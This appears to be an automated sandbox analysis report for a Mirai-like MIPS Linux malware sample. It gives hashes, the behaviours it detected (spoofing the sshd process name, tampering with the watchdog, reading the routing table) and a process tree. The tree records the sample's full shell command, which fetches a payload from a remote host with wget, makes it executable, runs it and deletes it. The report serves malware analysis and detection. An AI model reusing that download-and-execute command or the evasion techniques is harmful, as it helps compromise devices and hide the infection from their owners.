Analysis
max time kernel: 148s
max time network: 139s
platform: debian-9_mipsel
resource: debian9-mipsel-20240226-en
resource tags: arch:mipsel, image:debian9-mipsel-20240226-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mipsel, system
submitted: 02/04/2024, 01:16
Behavioral task: behavioral1
Sample: 93baaaabfc573289b7cea910738e996f36b616b93a40a2ecfb84d14d1a2e5da2.elf
Resource: debian9-mipsel-20240226-en
General
Target: 93baaaabfc573289b7cea910738e996f36b616b93a40a2ecfb84d14d1a2e5da2.elf
Size: 155KB
MD5: 66617f9932e2e20f48493f12c80fceb7
SHA1: 278410f9e356ad62dc2d66c426d2b60545918923
SHA256: 93baaaabfc573289b7cea910738e996f36b616b93a40a2ecfb84d14d1a2e5da2
SHA512: 22fa7850204dc9296eaba8312cebe36facc2cdb999590f0fca2cd8bbeb09cb049ec792e2439bd6b2fcc54e6a9bbab0f2199c4069705a315630228ca0855d2c91
SSDEEP: 3072:1LNqrhHZ0P6bRFBQivfRjHkLwmrThPaLEne7rNb:1Lsrr0PeRTJBgLwmrThPaLEne7rNb
Malware Config
Signatures

Changes its process name (1 IoCs)
  description: Changes the process name, possibly in an attempt to hide itself; ioc: sshd; pid: 709; Process: 93baaaabfc573289b7cea910738e996f36b616b93a40a2ecfb84d14d1a2e5da2.elf

Executes dropped EXE (1 IoCs)
  ioc: /tmp/.....; pid: 727; Process: .....

Modifies Watchdog functionality (1 TTPs, 2 IoCs)
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
  description: File opened for modification; ioc: /dev/misc/watchdog
  description: File opened for modification; ioc: /dev/watchdog

Reads system routing table (1 TTPs, 1 IoCs)
Gets active network interfaces from the /proc virtual filesystem.
  description: File opened for reading; ioc: /proc/net/route; Process: 93baaaabfc573289b7cea910738e996f36b616b93a40a2ecfb84d14d1a2e5da2.elf

Reads system network configuration (1 TTPs, 1 IoCs)
Uses contents of the /proc filesystem to enumerate network settings.
  description: File opened for reading; ioc: /proc/net/route; Process: 93baaaabfc573289b7cea910738e996f36b616b93a40a2ecfb84d14d1a2e5da2.elf

Writes file to tmp directory (1 IoCs)
Malware often drops required files in the /tmp directory.
  description: File opened for modification; ioc: /tmp/.....; Process: wget
Processes

/tmp/93baaaabfc573289b7cea910738e996f36b616b93a40a2ecfb84d14d1a2e5da2.elf (PID: 709)
  command: /tmp/93baaaabfc573289b7cea910738e996f36b616b93a40a2ecfb84d14d1a2e5da2.elf
  signatures: Changes its process name; Reads system routing table; Reads system network configuration
  /bin/sh (PID: 710)
    command: /bin/sh -c "wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf ....."
    /usr/bin/wget (PID: 714)
      command: wget -q http://gay.energy/.../vivid -O .....
      signatures: Writes file to tmp directory
    /bin/chmod (PID: 725)
      command: chmod 777 .....
    /tmp/..... (PID: 727)
      command: ./.....
      signatures: Executes dropped EXE
    /bin/sh (PID: 727)
      command: /bin/sh ./.....
    /bin/rm (PID: 730)
      command: rm -rf .....